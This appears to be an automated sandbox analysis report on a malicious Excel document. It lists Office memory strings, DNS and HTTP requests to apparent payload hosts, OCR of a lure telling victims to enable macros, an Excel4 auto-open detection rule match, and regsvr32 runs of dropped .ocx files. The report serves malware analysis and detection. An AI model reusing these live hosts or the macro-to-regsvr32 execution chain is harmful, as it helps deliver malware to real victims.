      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect)
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://roaming.edog.
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.come
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airlL?
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com4:
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com7
      Source: EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comR
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc:
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.como
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXEString found in binary or memory: https://tellmeservice.osi.office.net
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/I
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesV
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comOCSettingsCloudPolicyServiceAndroidUrlhttps://clients.config.office
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comeH
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msomP
      Source: unknownDNS traffic detected: queries for: greenflag.esp.br
      Source: global trafficHTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: greenflag.esp.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: noithat117.vnConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: playsis.com.brConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.3:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.3:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.3:49745 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 12Screenshot OCR: Enable Editing o 18 19 20 ljl PROTECTED VIEW Be careful - files from the Internet can contain vir
      Source: Screenshot number: 12Screenshot OCR: Enable Content 25 26 (D SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 0Screenshot OCR: Enable Content G) SECURITY WARNING Macros have been disabled. Enable Content If you are using a mo
      Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
      Source: Document image extraction number: 1Screenshot OCR: Enable Content C9 SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
      Source: Screenshot number: 16Screenshot OCR: Enable Editing o 18 19 20 ljl PROTECTED VIEW Be careful - files from the Internet can contain vir
      Source: Screenshot number: 16Screenshot OCR: Enable Content 25 26 (D SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
      Source: counter-1248368226.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor3
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor6
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor2
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor1
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor4
      Source: counter-1248368226.xlsMacro extractor: Sheet name: Bor5
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_16780CEC1_3_16780CEC
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 1_3_0FEA3E791_3_0FEA3E79
      Source: counter-1248368226.xlsOLE indicator, VBA macros: true
      Source: counter-1248368226.xls.1.drOLE indicator, VBA macros: true
      Source: CC657B23.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: counter-1248368226.xlsReversingLabs: Detection: 40%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: counter-1248368226.xlsOLE indicator, Workbook stream: true
      Source: counter-1248368226.xls.1.drOLE indicator, Workbook stream: true
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocxJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocxJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocxJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{2D709C6B-06C3-4955-B106-541C202F59AB} - OProcSessId.datJump to behavior
      Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: EXCEL.EXEString found in binary or memory: https://[OMEX.BaseHost]/api/addins/emailtemplate
      Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXEString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXEString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXEString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: classification engineClassification label: mal80.expl.winXLS@7/5@3/4
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
      Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: CC657B23.tmp.1.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
